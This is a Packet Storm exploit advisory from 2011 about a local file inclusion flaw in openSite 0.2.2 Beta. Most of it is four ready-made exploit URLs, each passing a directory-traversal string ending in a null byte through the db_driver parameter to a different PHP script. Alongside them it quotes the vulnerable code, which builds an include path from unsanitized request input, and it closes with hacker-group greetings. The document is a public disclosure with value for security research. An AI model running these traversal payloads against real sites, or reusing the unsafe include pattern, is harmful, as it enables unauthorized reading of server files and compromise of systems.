openSite 0.2.2 Beta Local File Inclusion

2011-01-07T00:00:00
ID PACKETSTORM:97313
Type packetstorm
Reporter n0n0x
Modified 2011-01-07T00:00:00

Description

                                        
                                            `#######################################################  
#opensite-v0.2.2-beta <=== Local File Include vuln  
#######################################################  
#By n0n0x  
#Homepage: http://priasantai.uni.cc/  
#Download script :http://sourceforge.net/projects/contentone/files/openSite/opensite-v0.2.2-beta/opensite-v0.2.2-beta.zip/download  
#######################################################  
=========================================  
xpl :  
http://site.com/os/upload/src/include.php?db_driver=../../../../../../../../../../LFI%00  
  
<?php  
session_start();  
header('Cache-control: private');  
  
include('variables.php');  
include('functions.php');  
include('drivers/'.$db_driver.'.php');  
=========================================  
xpl:  
http://site.com/os/upload/src/secure.php?db_driver=../../../../../../../../../../LFI%00  
  
<?php  
include('variables.php');  
include('functions.php');  
include('drivers/'.$db_driver.'.php');  
=========================================  
xpl:  
http://site.com/os/upload/src/content.php?db_driver=../../../../../../../../../../LFI%00  
  
<?php  
include('functions.php');  
include('drivers/'.$db_driver.'.php');  
=========================================  
xpl:  
http://site.com/os/upload/src/authenticate.php?db_driver=../../../../../../../../../../LFI%00  
  
<?php  
error_reporting('2037');  
  
$auth = false;  
$username = $_POST['username'];  
$password = $_POST['password'];  
  
if ( isset($username) & isset($password) ) {  
  
include('variables.php');  
include('functions.php');  
include('drivers/'.$db_driver.'.php');  
=========================================  
#######################################################  
#Greetz: all member | manadocoding.org - sekuritiOnline.net  
#  
# friends: angky.tatoki, EA ngel, bL4Ck_3n91n3, opa, x0r0n, team_elite, thama, s0ny,  
# devilbat, cr4wl3r, cyberl0g, lumut-, Anti_Hack, DskyMC, mr.c, doniskynet.  
#  
# chats : irc.auzs.net 6667-7000 #kesawan,#exploit-db  
######################################################  
  
`